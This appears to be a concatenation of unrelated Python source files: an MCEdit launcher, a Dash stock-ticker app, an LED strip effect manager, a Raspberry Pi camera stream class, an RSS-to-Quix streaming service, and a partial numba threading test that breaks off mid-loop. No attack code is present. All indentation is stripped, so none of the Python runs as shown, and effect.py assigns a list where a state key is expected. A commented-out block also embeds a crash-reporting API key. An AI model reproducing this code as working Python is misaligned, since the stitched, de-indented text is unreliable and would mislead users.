@classmethod
def fetch_version(cls):
with cls.version_lock:
cls.version_info = release.fetch_new_version_info()
def check_for_version(self):
new_version = release.check_for_new_version(self.version_info)
if new_version is not False:
answer = albow.ask(
_('Version {} is available').format(new_version["tag_name"]),
[
'Download',
'View',
'Ignore'
],
default=1,
cancel=2
)
if answer == "View":
platform_open(new_version["html_url"])
elif answer == "Download":
platform_open(new_version["asset"]["browser_download_url"])
albow.alert(_(' {} should now be downloading via your browser. You will still need to extract the downloaded file to use the updated version.').format(new_version["asset"]["name"]))
@classmethod
def main(cls):
PlayerCache().load()
displayContext = GLDisplayContext(splash.splash, caption=(('MCEdit ~ ' + release.get_version()%_("for")).encode('utf-8'), 'MCEdit'))
os.environ['SDL_VIDEO_CENTERED'] = '0'
rootwidget = RootWidget(displayContext.display)
mcedit = MCEdit(displayContext)
rootwidget.displayContext = displayContext
rootwidget.confirm_quit = mcedit.confirm_quit
rootwidget.mcedit = mcedit
rootwidget.add(mcedit)
rootwidget.focus_switch = mcedit
if 0 == len(pymclevel.alphaMaterials.yamlDatas):
albow.alert("Failed to load minecraft.yaml. Check the console window for details.")
if mcedit.droppedLevel:
mcedit.loadFile(mcedit.droppedLevel)
cls.version_lock = threading.Lock()
cls.version_info = None
cls.version_checked = False
fetch_version_thread = threading.Thread(target=cls.fetch_version)
fetch_version_thread.start()
# Disabled old update code
# if hasattr(sys, 'frozen'):
# # We're being run from a bundle, check for updates.
# import esky
#
# app = esky.Esky(
# sys.executable.decode(sys.getfilesystemencoding()),
# 'https://bitbucket.org/codewarrior0/mcedit/downloads'
# )
# try:
# update_version = app.find_update()
# except:
# # FIXME: Horrible, hacky kludge.
# update_version = None
# logging.exception('Error while checking for updates')
#
# if update_version:
# answer = albow.ask(
# 'Version "%s" is available, would you like to '
# 'download it?' % update_version,
# [
# 'Yes',
# 'No',
# ],
# default=0,
# cancel=1
# )
# if answer == 'Yes':
# def callback(args):
# status = args['status']
# status_texts = {
# 'searching': u"Finding updates...",
# 'found': u"Found version {new_version}",
# 'downloading': u"Downloading: {received} / {size}",
# 'ready': u"Downloaded {path}",
# 'installing': u"Installing {new_version}",
# 'cleaning up': u"Cleaning up...",
# 'done': u"Done."
# }
# text = status_texts.get(status, 'Unknown').format(**args)
#
# panel = Dialog()
# panel.idleevent = lambda event: panel.dismiss()
# label = albow.Label(text, width=600)
# panel.add(label)
# panel.size = (500, 250)
# panel.present()
#
# try:
# app.auto_update(callback)
# except (esky.EskyVersionError, EnvironmentError):
# albow.alert(_("Failed to install update %s") % update_version)
# else:
# albow.alert(_("Version %s installed. Restart MCEdit to begin using it.") % update_version)
# raise SystemExit()
if config.settings.closeMinecraftWarning.get():
answer = albow.ask(
"Warning: Only open a world in one program at a time. If you open a world at the same time in MCEdit and in Minecraft, you will lose your work and possibly damage your save file.\n\n If you are using Minecraft 1.3 or earlier, you need to close Minecraft completely before you use MCEdit.",
["Don't remind me again.", "OK"], default=1, cancel=1)
if answer == "Don't remind me again.":
config.settings.closeMinecraftWarning.set(False)
# Disabled Crash Reporting Option
# if not config.settings.reportCrashesAsked.get():
# answer = albow.ask(
# "When an error occurs, MCEdit can report the details of the error to its developers. "
# "The error report will include your operating system version, MCEdit version, "
# "OpenGL version, plus the make and model of your CPU and graphics processor. No personal "
# "information will be collected.\n\n"
# "Error reporting can be enabled or disabled in the Options dialog.\n\n"
# "Enable error reporting?",
# ["Yes", "No"],
# default=0)
# config.settings.reportCrashes.set(answer == "Yes")
# config.settings.reportCrashesAsked.set(True)
config.settings.reportCrashes.set(False)
config.settings.reportCrashesAsked.set(True)
config.save()
if "update" in config.version.version.get():
answer = albow.ask("There are new default controls. Do you want to replace your current controls with the new ones?", ["Yes", "No"])
if answer == "Yes":
for configKey, k in keys.KeyConfigPanel.presets["WASD"]:
config.keys[config.convert(configKey)].set(k)
config.version.version.set("1.1.2.0")
config.save()
if "-causeError" in sys.argv:
raise ValueError("Error requested via -causeError")
while True:
try:
rootwidget.run()
except (SystemExit, KeyboardInterrupt):
print "Shutting down..."
exc_txt = traceback.format_exc()
if mcedit.editor.level:
if config.settings.savePositionOnClose.get():
mcedit.editor.waypointManager.saveLastPosition(mcedit.editor.mainViewport, mcedit.editor.level.dimNo)
mcedit.editor.waypointManager.save()
# The following Windows specific code won't be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
#w = r-X
#h = b-Y
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
# Restore the previous language if we ran with '-tt' (update translation template).
if albow.translate.buildTemplate:
logging.warning('Restoring %s.'%orglang)
config.settings.langCode.set(orglang)
#
config.save()
mcedit.editor.renderer.discardAllChunks()
mcedit.editor.deleteAllCopiedSchematics()
if mcedit.editor.level:
mcedit.editor.level.close()
mcedit.editor.root.RemoveEditFiles()
if 'SystemExit' in traceback.format_exc() or 'KeyboardInterrupt' in traceback.format_exc():
raise
else:
if 'SystemExit' in exc_txt:
raise SystemExit
if 'KeyboardInterrupt' in exc_txt:
raise KeyboardInterrupt
except MemoryError:
traceback.print_exc()
mcedit.editor.handleMemoryError()
def saveWindowPosition(self):
"""Save the window position in the configuration handler."""
if DEBUG_WM:
print "############################ EXITING ############################"
win = self.displayContext.win
# The following Windows specific code will not be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
#w = r-X
#h = b-Y
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
elif win:
config.settings.windowMaximized.set(self.maximized)
if not self.maximized:
x, y = win.get_position()
else:
x, y = self.saved_pos
if DEBUG_WM:
print "x", x, "y", y
config.settings.windowX.set(x)
config.settings.windowY.set(y)
def restart(self):
self.saveWindowPosition()
config.save()
self.editor.renderer.discardAllChunks()
self.editor.deleteAllCopiedSchematics()
if self.editor.level:
self.editor.level.close()
self.editor.root.RemoveEditFiles()
python = sys.executable
if sys.argv[0].endswith('.exe') or hasattr(sys, 'frozen'):
os.execl(python, python, * sys.argv[1:])
else:
os.execl(python, python, * sys.argv)
def main(argv):
"""
Setup display, bundled schematics. Handle unclean
shutdowns.
"""
# This should eventually be revived, what is "squash_python"?
# try:
# import squash_python
#
# squash_python.uploader.SquashUploader.headers.pop("Content-encoding", None)
# squash_python.uploader.SquashUploader.headers.pop("Accept-encoding", None)
#
# version = release.get_version()
# client = squash_python.get_client()
# client.APIKey = "6ea52b17-ac76-4fd8-8db4-2d7303473ca2"
# client.environment = "unknown"
# client.host = "http://pixelhost.ezekielelin.com"
# client.notifyPath = "/mcedit_bugs.php"
# client.build = version
# client.timeout = 5
#
# Disabled Crash Reporting Option
# client.disabled = not config.settings.reportCrashesNew.get()
# client.disabled = True
#
# def _reportingChanged(val):
# client.disabled = not val
#
# config.settings.reportCrashes.addObserver(client, '_enabled', _reportingChanged)
# client.reportErrors()
# client.hook()
# except (ImportError, UnicodeError) as e:
# pass
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'directx'
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'windib'
display.init()
pygame.font.init()
try:
if not os.path.exists(directories.schematicsDir):
shutil.copytree(
os.path.join(directories.getDataDir(), u'stock-schematics'),
directories.schematicsDir
)
except Exception, e:
logging.warning('Error copying bundled schematics: {0!r}'.format(e))
try:
os.mkdir(directories.schematicsDir)
except Exception, e:
logging.warning('Error creating schematics folder: {0!r}'.format(e))
try:
ServerJarStorage()
except Exception, e:
logging.warning('Error creating server jar storage folder: {0!r}'.format(e))
try:
MCEdit.main()
except Exception as e:
print "mcedit.main MCEdit exited with errors."
logging.error("MCEdit version %s", release.get_version())
display.quit()
if hasattr(sys, 'frozen') and sys.platform == 'win32':
logging.exception("%s", e)
print "Press RETURN or close this window to dismiss."
raw_input()
raise
return 0
def getSelectedMinecraftVersion():
profile = directories.getMinecraftProfileJSON()[directories.getSelectedProfile()]
if 'lastVersionId' in profile:
return profile['lastVersionId']
else:
return '1.8'
def getLatestMinecraftVersion(snapshots=False):
import urllib2
import json
versioninfo = json.loads(urllib2.urlopen("http://s3.amazonaws.com/Minecraft.Download/versions/versions.json ").read())
if snapshots:
return versioninfo['latest']['snapshot']
else:
return versioninfo['latest']['release']
def weird_fix():
try:
from OpenGL.platform import win32
except Exception:
pass
class FakeStdOutErr:
"""Fake file object to redirect very last Python output.
Used to track 'errors' not handled in MCEdit.
Mimics 'write' and 'close' file objects methods.
Used on Linux only."""
mode = 'a'
def __init__(self, *args, **kwargs):
"""*args and **kwargs are ignored.
Deletes the 'logger' object and reopen 'logfile' in append mode."""
global logger
global logfile
del logger
self.fd = open(logfile, 'a')
def write(self, msg):
self.fd.write(msg)
def close(self, *args, **kwargs):
self.fd.flush()
self.fd.close()
if __name__ == "__main__":
try:
main(sys.argv)
except (SystemExit, KeyboardInterrupt):
# It happens that on Linux, Python tries to kill already dead processes and display errors in the console.
# Redirecting them to the log file preserve them and other errors which may occur.
if sys.platform == "linux2":
logger.debug("MCEdit is exiting normally.")
logger.debug("Lines below this one are pure Python output.")
sys.stdout = sys.stderr = FakeStdOutErr()
pass
except:
traceback.print_exc()
print ""
print "=================================="
print "\t\t\t MCEdit has crashed"
print "=================================="
raw_input("Press the Enter key to close this window")
pass
#sys.exit(main(sys.argv))
|
apps.py | # -*- coding: utf-8 -*-
import pandas_datareader.data as web
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from dash.dependencies import Input, Output
import requests
import pandas as pd
# multiprocessing handel static data request
import multiprocessing
def find_stock(name):
web.DataReader(name, 'morningstar', datetime.datetime(2015,1,1), datetime.datetime(2015,1,3))
return
# default stock
## morningstar
defaultStock = 'GOOGL'
start = datetime.datetime(2015,1,1)
end = datetime.datetime.now()
defaultdf = web.DataReader(defaultStock, 'morningstar', start, end)
## alphavantage
alpha_API_URL = "https://www.alphavantage.co/query"
alpha_API_key = "xxxxxx"
alpha_params = {"function": "TIME_SERIES_INTRADAY",
"symbol": defaultStock,
"interval": "1min",
"apikey": alpha_API_key
}
response = requests.get(alpha_API_URL, params=alpha_params)
alpha_df = pd.DataFrame(response.json()['Time Series (1min)']).transpose()
#alpha_df.index = pd.to_datetime(alpha_df.index)
# create app
app = dash.Dash()
app.layout = html.Div( children=[
html.H1(
children='Stocks',
style = {'textAlign': 'center' }
),
html.Div(
children='stock ticker',
style = {'textAlign': 'center' }
),
dcc.Input(
id = 'input', value = '', type = 'text'
),
html.Div(
id = 'error-message', children = ''
),
html.Div( children=[
dcc.Graph(
id='example-graph'
),
dcc.Graph(
id='daily-graph'
)
], style={'columnCount': 2}
)
], style={'textAlign': 'center',
# 'backgroundColor': '#111111',
'color': '#69F7AB'})
## error stock ticker catch
@app.callback(
Output(component_id = 'error-message', component_property = 'children'),
[Input(component_id = 'input', component_property = 'value')]
)
def error_raise(input_val):
if len(input_val) == 0:
return 'Please Enter Stock\'s name'
stock = str(input_val)
p = multiprocessing.Process(target=find_stock, args=(stock,))
p.start()
p.join(1) # wait the request for 1 second
if p.is_alive():
print "Request has been running for 1 seconds... let's kill it..."
# Terminate
p.terminate()
p.join()
return 'Ticker - {} - Request Failed: Please try other names'.format(stock)
print "Ticker - {} -Request Success".format(stock)
return ''
## plot static chart
@app.callback(
Output(component_id = 'example-graph', component_property = 'figure'),
[Input(component_id = 'input', component_property = 'value'),
Input(component_id = 'error-message', component_property = 'children')]
)
def update_graph(input_val,error_mes):
global defaultdf
global defaultStock
error_mes = str(error_mes)
if len(input_val) != 0 and len(error_mes) == 0 :
stock = str(input_val)
start = datetime.datetime(2016, 1, 1)
end = datetime.datetime.now()
df = web.DataReader(stock, 'morningstar' , start, end)
defaultdf = df
defaultStock = stock
return {
'data': [go.Scatter( x=df.index.get_level_values('Date') , y=df.Close )] ,
'layout': { 'title': input_val + " from 2016", }
}
return {
'data': [go.Scatter( x=defaultdf.index.get_level_values('Date') , y=defaultdf.Close )] ,
'layout': { 'title': defaultStock + " from 2016", }
}
## plot daily chart
@app.callback(
Output(component_id = 'daily-graph', component_property = 'figure'),
[Input(component_id = 'input', component_property = 'value'),
Input(component_id = 'error-message', component_property = 'children')]
)
def update_daily(input_val,error_mes):
global alpha_df
global defaultStock
error_mes = str(error_mes)
if len(input_val) != 0 and len(error_mes) == 0 :
params = {"function": "TIME_SERIES_INTRADAY",
"symbol": str(input_val),
"interval": "1min",
"apikey": alpha_API_key
}
response = requests.get(alpha_API_URL, params=params)
response = response.json()
# handel request error
if 'Error Message' in response:
pass
else:
alpha_df = pd.DataFrame(response['Time Series (1min)']).transpose()
defaultStock = str(input_val)
return {
'data': [go.Scatter( x=alpha_df.index,
y=alpha_df['4. close'],
) ],
'layout': {
'height': 430,
'title': defaultStock + " Daily",
'xaxis': {'showgrid': False}
}
}
if __name__ == '__main__':
app.run_server(debug=True)
|
effect.py | import time
from threading import Thread
from rpi_ws281x import Color
class Effect:
def __init__(self, strip):
self.strip = strip
def update(self):
pass
class EffectManager:
def __init__(self, strip):
self.strip = strip
self.arg = 0
self.states = {
'idle': IdleEffect(strip),
'preparing': PreparingEffect(strip)
}
self.currentState = 'idle'
thread = Thread(target=self.update)
thread.start()
def change_state(self, rawState):
parts = rawState.split(':')
state = parts[0]
if len(parts) > 1:
self.arg = parts[1]
if state in self.states:
self.currentState = state.split(':')
def update(self):
while True:
self.states[self.currentState].update(self.arg)
time.sleep(0.016)
class IdleEffect(Effect):
def update(self, _progress):
for i in range(self.strip.numPixels()):
self.strip.setPixelColor(i, Color(255, 215, 0))
self.strip.show()
class PreparingEffect(Effect):
def update(self, progress):
pixelCount = int(self.strip.numPixels() * (progress/100.0))
for i in range(pixelCount):
self.strip.setPixelColor(i, Color(0, 255, 255))
self.strip.show() |
PiCam.py | # built upon: https://github.com/jrosebr1/imutils/blob/master/imutils/video/pivideostream.py
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
# import cv2
# import numpy as np
import json
class PiCam:
def __init__(self, resolution=(640, 480)):
# initialize the camera
# self.update_values()
self.frame = None
# init thread
self.stopped = False
# init check to identify duplicate frames
self.frame_count = 0
config_path = 'config/config.json'
with open(config_path) as config_file:
config = json.load(config_file)
self.camera = PiCamera()
# set resolution
resolution = config["picam_config"]["resolution"]["set"]
self.camera.resolution = (resolution[0], resolution[1])
#print(self.camera.resolution)
# set picamera setting
# picamera settings https://picamera.readthedocs.io/en/release-1.10/api_camera.html
self.camera.framerate = config["picam_config"]["framerate"]
self.camera.awb_mode = config["picam_config"]["awb_mode"]
self.camera.awb_gains = config["picam_config"]["awb_gains"]
self.camera.exposure_mode = config["picam_config"]["exposure_mode"]
self.camera.image_effect = config["picam_config"]["image_effect"]["set"]
#print(self.camera.image_effect)
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
self.picam_fully_stopped = False
# def update_values(self):
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
# set to check if frame was updated in main thread
if self.frame_count < 1000:
self.frame_count += 1
else:
# reset counter
self.frame_count = 0
self.rawCapture.truncate(0)
def read(self):
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True |
main.py | from quixstreaming import QuixStreamingClient
from quixstreaming.state.localfilestorage import LocalFileStorage
import quixstreaming as qs
# use feed parser
import feedparser
import os
from datetime import datetime
import json
import time
import threading
storage = LocalFileStorage()
client = QuixStreamingClient()
output_topic = client.open_output_topic(os.environ["output"])
stream_writer = output_topic.create_stream("RSS Data" + datetime.now().strftime("%m-%d-%Y--%H-%M-%S"))
# should the main loop keep going?
shutting_down = False
# store the id's so we dont duplicate feed items
ids = []
def log(message: str):
print("{} - {}".format(datetime.now(), message))
if storage.containsKey("rss_ids"):
ids = storage.get("rss_ids")
log("ids loaded from state")
def main():
while not shutting_down:
rss = feedparser.parse(os.environ["rss_url"])
new_items=0
# iterate through the entries
for e in rss.entries:
rss_id = e["id"]
if rss_id in ids:
log("Already seen this one!")
continue # comment this line if you want constant data and dont care about duplicates
# add the id, so we know we've seen this one
ids.append(rss_id)
# write the rss feed entry to Quix as an event
stream_writer.events \
.add_timestamp(datetime.now()) \
.add_value("RSS_RAW", json.dumps(e))\
.write()
# also write it as parameter data
# these will be individual parameters, groupable by RSS_ID
timestamp = stream_writer.parameters.buffer.add_timestamp(datetime.now())
# iterate the datas keys
for key in e.keys():
value = str(e[key]) # convert everything to a string
timestamp \
.add_tag("RSS_ID", rss_id) \
.add_value(key, value)
# write the data
timestamp.write()
# just flush to be sure its all gone
stream_writer.events.flush()
stream_writer.parameters.flush()
new_items += 1
log("Written {} RSS items to stream".format(new_items))
# this is optional but saves a bit of resource if nothing is happening
# sleep for a bit, nothing new is happening.
# stop sleeping if process termination requested
# dont sleep if there was something new, there might be some hot news breaking
sleep_time = 50 # can change the sleep time to whatever you want
sleeping = sleep_time if new_items > 0 else 0
message = "Not much is happening" if new_items == 0 else "Things are heating up"
log("{} sleeping for {} seconds".format(message, abs(sleeping - sleep_time)))
#sleeping = 0
while sleeping <= 5 and not shutting_down:
sleeping = sleeping + 1
time.sleep(1)
# handle shutdown nicely
def before_shutdown():
global shutting_down
# tell the main loop were heading out
shutting_down = True
# commit the latest rss_id list to the persisted storage
storage.set("rss_ids", ids)
if __name__ == "__main__":
# create and start the thread where all the good stuff happens
main_thread = threading.Thread(target = main)
main_thread.start()
# run the app and handle shutdown nicely
qs.App.run(before_shutdown=before_shutdown)
main_thread.join() |
test_num_threads.py | # -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
import sys
import os
import re
import multiprocessing
import unittest
import numpy as np
from numba import (njit, set_num_threads, get_num_threads, prange, config,
threading_layer, guvectorize)
from numba.np.ufunc.parallel import _get_thread_id
from numba.core.errors import TypingError
from numba.tests.support import TestCase, skip_parfors_unsupported, tag
from numba.tests.test_parallel_backend import TestInSubprocess
class TestNumThreads(TestCase):
_numba_parallel_test_ = False
def setUp(self):
# Make sure the num_threads is set to the max. This also makes sure
# the threads are launched.
set_num_threads(config.NUMBA_NUM_THREADS)
def check_mask(self, expected, result):
# There's no guarantee that TBB will use a full mask worth of
# threads if it deems it inefficient to do so
if threading_layer() == 'tbb':
self.assertTrue(np.all(result <= expected))
elif threading_layer() in ('omp', 'workqueue'):
np.testing.assert_equal(expected, result)
else:
assert 0, 'unreachable'
@skip_parfors_unsupported
def test_set_num_threads_type(self):
@njit
def foo():
set_num_threads('wrong_type')
expected = "The number of threads specified must be an integer"
for fn, errty in ((foo, TypingError), (foo.py_func, TypeError)):
with self.assertRaises(errty) as raises:
fn()
self.assertIn(expected, str(raises.exception))
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_basic(self):
max_threads = config.NUMBA_NUM_THREADS
self.assertEqual(get_num_threads(), max_threads)
set_num_threads(2)
self.assertEqual(get_num_threads(), 2)
set_num_threads(max_threads)
self.assertEqual(get_num_threads(), max_threads)
with self.assertRaises(ValueError):
set_num_threads(0)
with self.assertRaises(ValueError):
set_num_threads(max_threads + 1)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_basic_jit(self):
max_threads = config.NUMBA_NUM_THREADS
@njit
def get_n():
return get_num_threads()
self.assertEqual(get_n(), max_threads)
set_num_threads(2)
self.assertEqual(get_n(), 2)
set_num_threads(max_threads)
self.assertEqual(get_n(), max_threads)
@njit
def set_get_n(n):
set_num_threads(n)
return get_num_threads()
self.assertEqual(set_get_n(2), 2)
self.assertEqual(set_get_n(max_threads), max_threads)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_basic_guvectorize(self):
max_threads = config.NUMBA_NUM_THREADS
@guvectorize(['void(int64[:])'],
'(n)',
nopython=True,
target='parallel')
def get_n(x):
x[:] = get_num_threads()
x = np.zeros((5000000,), dtype=np.int64)
get_n(x)
np.testing.assert_equal(x, max_threads)
set_num_threads(2)
x = np.zeros((5000000,), dtype=np.int64)
get_n(x)
np.testing.assert_equal(x, 2)
set_num_threads(max_threads)
x = np.zeros((5000000,), dtype=np.int64)
get_n(x)
np.testing.assert_equal(x, max_threads)
@guvectorize(['void(int64[:])'],
'(n)',
nopython=True,
target='parallel')
def set_get_n(n):
set_num_threads(n[0])
n[:] = get_num_threads()
x = np.zeros((5000000,), dtype=np.int64)
x[0] = 2
set_get_n(x)
np.testing.assert_equal(x, 2)
x = np.zeros((5000000,), dtype=np.int64)
x[0] = max_threads
set_get_n(x)
np.testing.assert_equal(x, max_threads)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_outside_jit(self):
# Test set_num_threads outside a jitted function
set_num_threads(2)
@njit(parallel=True)
def test_func():
x = 5
buf = np.empty((x,))
for i in prange(x):
buf[i] = get_num_threads()
return buf
@guvectorize(['void(int64[:])'],
'(n)',
nopython=True,
target='parallel')
def test_gufunc(x):
x[:] = get_num_threads()
out = test_func()
np.testing.assert_equal(out, 2)
x = np.zeros((5000000,), dtype=np.int64)
test_gufunc(x)
np.testing.assert_equal(x, 2)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_inside_jit(self):
# Test set_num_threads inside a jitted function
@njit(parallel=True)
def test_func(nthreads):
x = 5
buf = np.empty((x,))
set_num_threads(nthreads)
for i in prange(x):
buf[i] = get_num_threads()
return buf
mask = 2
out = test_func(mask)
np.testing.assert_equal(out, mask)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_set_num_threads_inside_guvectorize(self):
# Test set_num_threads inside a jitted guvectorize function
@guvectorize(['void(int64[:])'],
'(n)',
nopython=True,
target='parallel')
def test_func(x):
set_num_threads(x[0])
x[:] = get_num_threads()
x = np.zeros((5000000,), dtype=np.int64)
mask = 2
x[0] = mask
test_func(x)
np.testing.assert_equal(x, mask)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_get_num_threads_truth_outside_jit(self):
for mask in range(2, min(6, config.NUMBA_NUM_THREADS + 1)):
set_num_threads(mask)
# a lot of work, hopefully will trigger "mask" count of threads to
# join the parallel region (for those backends with dynamic threads)
@njit(parallel=True)
def test_func():
x = 5000000
buf = np.empty((x,))
for i in prange(x):
buf[i] = _get_thread_id()
return len(np.unique(buf)), get_num_threads()
out = test_func()
self.check_mask((mask, mask), out)
@guvectorize(['void(int64[:], int64[:])'],
'(n), (m)',
nopython=True,
target='parallel')
def test_gufunc(x, out):
x[:] = _get_thread_id()
out[0] = get_num_threads()
# Reshape to force parallelism
x = np.full((5000000,), -1, dtype=np.int64).reshape((100, 50000))
out = np.zeros((1,), dtype=np.int64)
test_gufunc(x, out)
self.check_mask(mask, out)
self.check_mask(mask, len(np.unique(x)))
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_get_num_threads_truth_inside_jit(self):
for mask in range(2, min(6, config.NUMBA_NUM_THREADS + 1)):
# a lot of work, hopefully will trigger "mask" count of threads to
# join the parallel region (for those backends with dynamic threads)
@njit(parallel=True)
def test_func():
set_num_threads(mask)
x = 5000000
buf = np.empty((x,))
for i in prange(x):
buf[i] = _get_thread_id()
return len(np.unique(buf)), get_num_threads()
out = test_func()
self.check_mask((mask, mask), out)
@guvectorize(['void(int64[:], int64[:])'],
'(n), (m)',
nopython=True,
target='parallel')
def test_gufunc(x, out):
set_num_threads(mask)
x[:] = _get_thread_id()
out[0] = get_num_threads()
# Reshape to force parallelism
x = np.full((5000000,), -1, dtype=np.int64).reshape((100, 50000))
out = np.zeros((1,), dtype=np.int64)
test_gufunc(x, out)
self.check_mask(mask, out)
self.check_mask(mask, len(np.unique(x)))
# this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
# set or >= 2) and TBB backends
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_nested_parallelism_1(self):
if threading_layer() == 'workqueue':
self.skipTest("workqueue is not threadsafe")
# check that get_num_threads is ok in nesting
mask = config.NUMBA_NUM_THREADS - 1
N = config.NUMBA_NUM_THREADS
M = 2 * config.NUMBA_NUM_THREADS
@njit(parallel=True)
def child_func(buf, fid):
M, N = buf.shape
for i in prange(N):
buf[fid, i] = get_num_threads()
def get_test(test_type):
if test_type == 'njit':
def test_func(nthreads, py_func=False):
@njit(parallel=True)
def _test_func(nthreads):
acc = 0
buf = np.zeros((M, N))
set_num_threads(nthreads)
for i in prange(M):
local_mask = 1 + i % mask
# set threads in parent function
set_num_threads(local_mask)
if local_mask < N:
child_func(buf, local_mask)
acc += get_num_threads()
return acc, buf
if py_func:
return _test_func.py_func(nthreads)
else:
return _test_func(nthreads)
elif test_type == 'guvectorize':
def test_func(nthreads, py_func=False):
def _test_func(acc, buf, local_mask):
set_num_threads(nthreads)
# set threads in parent function
set_num_threads(local_mask[0])
if local_mask[0] < N:
child_func(buf, local_mask[0])
acc[0] += get_num_threads()
buf = np.zeros((M, N), dtype=np.int64)
acc = np.zeros((M, 1), dtype=np.int64)
local_mask = (1 + np.arange(M) % mask).reshape((M, 1))
sig = ['void(int64[:], int64[:, :], int64[:])']
layout = '(p), (n, m), (p)'
if not py_func:
_test_func = guvectorize(sig, layout, nopython=True,
target='parallel')(_test_func)
else:
_test_func = guvectorize(sig, layout,
forceobj=True)(_test_func)
_test_func(acc, buf, local_mask)
return acc, buf
return test_func
for test_type in ['njit', 'guvectorize']:
test_func = get_test(test_type)
got_acc, got_arr = test_func(mask)
exp_acc, exp_arr = test_func(mask, py_func=True)
np.testing.assert_equal(exp_acc, got_acc)
np.testing.assert_equal(exp_arr, got_arr)
# check the maths reconciles, guvectorize does not reduce, njit does
math_acc_exp = 1 + np.arange(M) % mask
if test_type == 'guvectorize':
math_acc = math_acc_exp.reshape((M, 1))
else:
math_acc = np.sum(math_acc_exp)
np.testing.assert_equal(math_acc, got_acc)
math_arr = np.zeros((M, N))
for i in range(1, N):
# there's branches on 1, ..., num_threads - 1
math_arr[i, :] = i
np.testing.assert_equal(math_arr, got_arr)
# this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
# set or >= 2) and TBB backends
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
def _test_nested_parallelism_2(self):
if threading_layer() == 'workqueue':
self.skipTest("workqueue is not threadsafe")
# check that get_num_threads is ok in nesting
N = config.NUMBA_NUM_THREADS + 1
M = 4 * config.NUMBA_NUM_THREADS + 1
def get_impl(child_type, test_type):
if child_type == 'parallel':
child_dec = njit(parallel=True)
elif child_type == 'njit':
child_dec = njit(parallel=False)
elif child_type == 'none':
def child_dec(x):
return x
@child_dec
def child(buf, fid):
M, N = buf.shape
set_num_threads(fid) # set threads in child function
for i in prange(N):
buf[fid, i] = get_num_threads()
if test_type in ['parallel', 'njit', 'none']:
if test_type == 'parallel':
test_dec = njit(parallel=True)
elif test_type == 'njit':
test_dec = njit(parallel=False)
elif test_type == 'none':
def test_dec(x):
return x
@test_dec
def test_func(nthreads):
buf = np.zeros((M, N))
set_num_threads(nthreads)
for i in prange(M):
local_mask = 1 + i % mask
# when the threads exit the child functions they should
# have a TLS slot value of the local mask as it was set
# in child
if local_mask < config.NUMBA_NUM_THREADS:
child(buf, local_mask)
assert get_num_threads() == local_mask
return buf
else:
if test_type == 'guvectorize':
test_dec = guvectorize(['int64[:,:], int64[:]'],
'(n, m), (k)', nopython=True,
target='parallel')
elif test_type == 'guvectorize-obj':
test_dec = guvectorize(['int64[:,:], int64[:]'],
'(n, m), (k)', forceobj=True)
def test_func(nthreads):
@test_dec
def _test_func(buf, local_mask):
set_num_threads(nthreads)
# when the threads exit the child functions they should
# have a TLS slot value of the local mask as it was set
# in child
if local_mask[0] < config.NUMBA_NUM_THREADS:
child(buf, local_mask[0])
assert get_num_threads() == local_mask[0]
buf = np.zeros((M, N), dtype=np.int64)
local_mask = (1 + np.arange(M) % mask).reshape((M, 1))
_test_func(buf, local_mask)
return buf
return test_func
mask = config.NUMBA_NUM_THREADS - 1
res_arrays = {}
for test_type in ['parallel', 'njit', 'none',
'guvectorize', 'guvectorize-obj']:
for child_type in ['parallel', 'njit', 'none']:
if child_type == 'none' and test_type != 'none':
continue
set_num_threads(mask)
res_arrays[test_type, child_type] = get_impl(
child_type, test_type)(mask)
